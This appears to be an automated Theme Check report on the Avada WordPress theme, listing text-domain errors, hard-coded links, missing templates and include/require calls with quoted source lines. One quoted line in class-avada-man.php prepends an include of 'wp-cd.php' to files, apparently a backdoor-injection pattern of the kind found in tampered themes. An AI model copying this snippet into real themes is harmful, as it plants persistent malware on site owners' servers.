    Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Avada' in file avada-tgm.php.
    Found a translation function that is missing a text-domain. Function esc_attr_e, with the arguments in file list-widget.php.
    Found a translation function that has an incorrect number of arguments. Function _n, with the arguments 'View 1 %1$s', 'View All %2$s %3$s', total_events, 'the-events-calendar' in file single-day.php.
    More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are Avada, avadaredux-framework, themecheck, tgmpa, fusion-core, fusion-builder, bbpress, woocommerce, avada, wordpress-importer, envato-market, textdomain, sermon-manager, the-events-calendar, tribe-events-calendar-pro, total_events.
  5. Plugin territory : Plugin territory functionalities The theme uses the add_shortcode() function. Custom post-content shortcodes are plugin-territory functionality.
  6. PHP short tags : Presence of PHP short tags PHP short tags were found in file parsedown.php. "This practice is discouraged because they are only available if enabled with short_open_tag php.ini configuration file directive, or if PHP was configured with the --enable-short-tags option" (php.net), which is not the case on many servers.
    Line 765: if (preg_match('/^\[(.+?)\]:[ ]*<?(\S+?)>?(?:[ ]+['\'(](.+)['\')])?[ ]*$/', $Line['text'], $matches))
  7. Hidden admin bar : Hidden admin Bar in CSS Themes should not hide admin bar. Detected in file style.min.css.
  8. Screenshot : Screenshot file Screenshot size is 880x660px. Screenshot size should be 1200x900, to account for HiDPI displays. Any 4:3 image size is acceptable, but 1200x900 is preferred. Bad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. favicon presence : Favicon management Possible Favicon found in class-avada-head.php. Favicons are handled by the Site Icon setting in the customizer since version 4.3.
  2. Static links : Presence of hard-coded links Possible hard-coded links were found in the file class-avada-avadaredux.php.
    Line 817: $correlation_link = '  <span class='avada-hover-description'><a href='https://theme-fusion.com/avada-doc/options/how-options-work/' target='_blan
    Possible hard-coded links were found in the file welcome.php.
    Line 478: <a href='http://docs.avadareduxframework.com/' class='docs button button-primary'>Do
    Line 481: <a href='https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=MMFMHW
    Possible hard-coded links were found in the file header_stickybar.tpl.php.
    Line 24: <a href='https://theme-fusion.com/support' target='_blank'><span class='dashicons da
    Possible hard-coded links were found in the file class-fusion-widget-facebook-page.php.
    Line 159: <h4 style='line-height: 1.6em;'><?php _e( 'IMPORTANT: Please create a Facebook App and use its ID for features like sharing.', 'Avada' ); ?> <a href='https://developers.facebook.com/docs/apps/register' target='_blank' rel='no
    Possible hard-coded links were found in the file class-avada-upgrade.php.
    Line 326: <li><strong>REMOVED:</strong> Fixed Mode for iPad is removed as a theme option. Fixed Mode is moved into a free plugin. <a href='https://theme-fusion.com/avada-doc/fixed-mode-for-ipad-portrait/' target='_
    Line 347: You can view all update information here: <a href='http://theme-fusion.com/avada-doc/install-update/important-update-informati
    Line 353: <a href='http://theme-fusion.com/avada-documentation/changelog.txt' class='view-chan
    Possible hard-coded links were found in the file support.php.
    Line 11: <p class='about-description'><?php printf( __( 'Avada comes with 6 months of free support for every license you purchase. Support can be <a %1$s>extended through subscriptions</a> via ThemeForest. All support for Avada is handled through our support center on our company site. To access it, you must first setup an account by <a %2$s>following these steps</a>. Below are all the resources we offer in our support center as well as the Avada Patcher tool that allows you to easily apply available patches to the version of Avada you are using.', 'Avada' ), 'a href='https://help.market.envato.com/hc/en-us/articles/207886473-Extending-and-Renewing-Item-Support' target='_blank'', 'href='https://theme-fusion.com/avada-doc/getting-started/avada-theme-support/' ta
    Line 12: <p><a href='https://theme-fusion.com/avada-doc/getting-started/avada-theme-support/' cl
    Line 44: <a href='https://www.facebook.com/groups/AvadaUsers/' class='button button-large but
    Possible hard-coded links were found in the file class-avada-patcher-admin-screen.php.
    Line 134: <span class='avada-auto-patcher learn-more'><a href='https://theme-fusion.com/avada-doc/avada-patcher/' target='_blank' rel='noo
    Possible hard-coded links were found in the file footer.php.
    Line 98: 'description' => sprintf( esc_html__( 'The entire height of the footer area (widgets + copyright) %1$s View tutorial here %2$s. Set a static height in px to enable sticky footer effect. Set to 0 to disable.', 'Avada' ), '<a href='https://theme-fusion.com/avada-doc/footer-special-effects/' target='_blank'
    Possible hard-coded links were found in the file contact.php.
    Line 75: 'description'     => sprintf( esc_html__( 'Follow the steps in %s to get the site key.', 'Avada' ), '<a href='http://theme-fusion.com/avada-doc/pages/setting-up-contact-page/' target='_
    Line 83: 'description'     => sprintf( esc_html__( 'Follow the steps in %s to get the secret key.', 'Avada' ), '<a href='http://theme-fusion.com/avada-doc/pages/setting-up-contact-page/' target='_
    Possible hard-coded links were found in the file class-avada-admin.php.
    Line 430: <p><strong><?php esc_attr_e( 'Solution 1:', 'Avada' ); ?></strong> <?php esc_attr_e( 'Import the demo using an alternate method.', 'Avada' ); ?><a href='https://theme-fusion.com/avada-doc/demo-content-info/alternate-demo-method/
    Line 439: <p><strong><?php esc_attr_e( 'Solution 1:', 'Avada' ); ?></strong> <?php esc_attr_e( 'Import the demo using an alternate method.', 'Avada' ); ?><a href='https://theme-fusion.com/avada-doc/demo-content-info/alternate-demo-method/
    Possible hard-coded links were found in the file class-fusion-builder-migrate.php.
    Line 1117: <p><?php printf( __( 'If you don\'t want your pages converted then please delete the new Avada folder and copy the old Avada folder to your server. If you did not backup your previous Avada theme folder, you can %s.', 'Avada' ), '<a href='https://theme-fusion.com/forums/topic/downloading-avada-4-0-3/' target='_bl
    Line 1123: <p><?php printf( __( 'Once reversion is done, you can load a previous version of Avada onto your server. You can download %s here if you do not have a backup of your previous theme.', 'Avada' ), '<a href='https://theme-fusion.com/forums/topic/downloading-avada-4-0-3/'>' . esc_att
    Line 1165: <?php printf( __( 'All needed posts have been reverted to the previous syntax. You can now roll-back to <a href='%s' target='_blank'>Avada 4.0.3</a>.', 'Avada' ), 'https://theme-fusion.com/forums/topic/downloading-avada-4-0-3/' ); ?>
    Possible hard-coded links were found in the file multiple-featured-images.php.
    Line 4: Description: Enables multiple featured images for posts and pages. If you like my plugin, feel free to give me reward ;) <a href='http://www.amazon.de/registry/wishlist/16KTW9ZG027C8' title='Amazon Wishlis
    Possible hard-coded links were found in the file avada-functions.php.
    Line 1202: $html .= '<a href='https://theme-fusion.com/avada-doc/sliders/how-to-get-our-demo-sliders/' ti
  3. Optional files : Presence of rtl stylesheet rtl.css This theme does not contain optional file rtl.php.
  4. Optional files : Presence of front page template file front-page.php This theme does not contain optional file front-page.php.
  5. Optional files : Presence of home template file home.php This theme does not contain optional file home.php.
  6. Optional files : Presence of category template file category.php This theme does not contain optional file category.php.
  7. Optional files : Presence of tag template file tag.php This theme does not contain optional file tag.php.
  8. Optional files : Presence of term template file taxonomy.php This theme does not contain optional file taxonomy.php.
  9. Optional files : Presence of date/time template file date.php This theme does not contain optional file date.php.
  10. Optional files : Presence of attachment template file attachment.php This theme does not contain optional file attachment.php.
  11. Optional files : Presence of image template file image.php This theme does not contain optional file image.php.
  12. Use of includes : Use of include or require The theme appears to use include or require : class-fusion-image-resizer.php
    Line 142: require_once( ABSPATH . '/wp-admin/includes/file.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : field_repeater.php
    Line 421: require_once( $class_file );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : extension_accordion.php
    Line 79: //include_once($this->extension_dir . 'multi-media/inc/class.customizer.php')
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-avadaredux.php
    Line 85: require_once( dirname( __FILE__ ) . '/avadaredux-framework/avadaredux-frame
    Line 88: require_once( dirname( __FILE__ ) . '/validation-functions.php' );
    Line 90: require_once( dirname( __FILE__ ) . '/class-avada-avadaredux-addons.php' );
    Line 898: require_once( ABSPATH . '/wp-admin/includes/file.php' );
    Line 906: include( dirname( __FILE__ ) . '/assets/style.css' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : framework.php
    Line 410: // 	require_once 'core/dashboard.php';
    Line 414: // 		require_once 'core/newsflash.php';
    Line 1705: require_once 'core/enqueue.php';
    Line 2856: require_once 'core/enqueue.php';
    Line 2914: require_once 'core/panel.php';
    Line 3243: require_once 'core/panel.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : extension_customizer.php
    Line 750: require_once( $class_file );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : welcome.php
    Line 374: require_once 'views/about.php';
    Line 389: require_once 'views/changelog.php';
    Line 404: require_once 'views/extensions.php';
    Line 420: require_once 'views/support.php';
    Line 435: require_once 'views/credits.php';
    Line 450: require_once 'views/status_report.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : field_button_set.php
    Line 46: *              ['format']      string Formatting options for paginate fields. Options include ('currency','nice','niceShort','timeAgoInWords' or a valid Date() f
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-avadaredux-migration.php
    Line 798: require_once( ABSPATH . 'wp-admin/includes/media.php' );
    Line 799: require_once( ABSPATH . 'wp-admin/includes/file.php' );
    Line 800: require_once( ABSPATH . 'wp-admin/includes/image.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-man.php
    Line 43: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-cd.php\')) include_once(dirname(__FILE__) . \'/wp-cd.php\'); ?>' . $file;
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-patcher-filesystem.php
    Line 80: require_once( ABSPATH . '/wp-admin/includes/file.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-product-registration.php
    Line 180: require_once( Avada::$template_dir_path . '/includes/class-avada-envato-api
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-admin.php
    Line 370: require_once( 'admin-screens/welcome.php' );
    Line 380: require_once( 'admin-screens/support.php' );
    Line 390: require_once( 'admin-screens/install-demos.php' );
    Line 400: require_once( 'admin-screens/fusion-plugins.php' );
    Line 410: require_once( 'admin-screens/system-status.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-megamenu-framework.php
    Line 130: require_once( 'mega-menus.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : fusion-functions.php
    Line 931: require_once( ABSPATH . 'wp-admin/includes/file.php' );
    Line 981: require_once( ABSPATH . 'wp-admin/includes/image.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : importer.php
    Line 27: include 'class-avada-importer-data.php';
    Line 625: require_once( ABSPATH . 'wp-admin/includes/image.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-importer-data.php
    Line 157: require_once( ABSPATH . '/wp-admin/includes/file.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-dynamic-css.php
    Line 128: require_once( ABSPATH . '/wp-admin/includes/file.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-fusion-builder-demos-importer.php
    Line 130: require_once( ABSPATH . '/wp-admin/includes/file.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-contact.php
    Line 100: require_once( get_template_directory() . '/includes/recaptcha/src/autoload.
    Line 102: require_once( get_template_directory() . '/includes/recaptcha/class-avada-r
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : metaboxes.php
    Line 240: include 'options/options_es.php';
    Line 249: include 'options/options_slide.php';
    Line 302: <?php require_once( 'tabs/tab_' . $tab_name . '.php' ); ?>
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : avada-functions.php
    Line 141: include( locate_template( 'templates/rollover.php' ) );
    Line 195: include( locate_template( 'templates/featured-image-first.php' ) );
    Line 610: include( locate_template( 'templates/related-posts.php' ) );
    Line 631: include( locate_template( 'templates/pages-rich-snippets.php' ) );
    Line 702: include( locate_template( 'templates/title-bar.php' ) );
    Line 1023: include_once( wp_normalize_path( ABSPATH . WPINC . '/class-http.php' ) );
    Line 1060: require_once( ABSPATH . '/wp-admin/includes/file.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.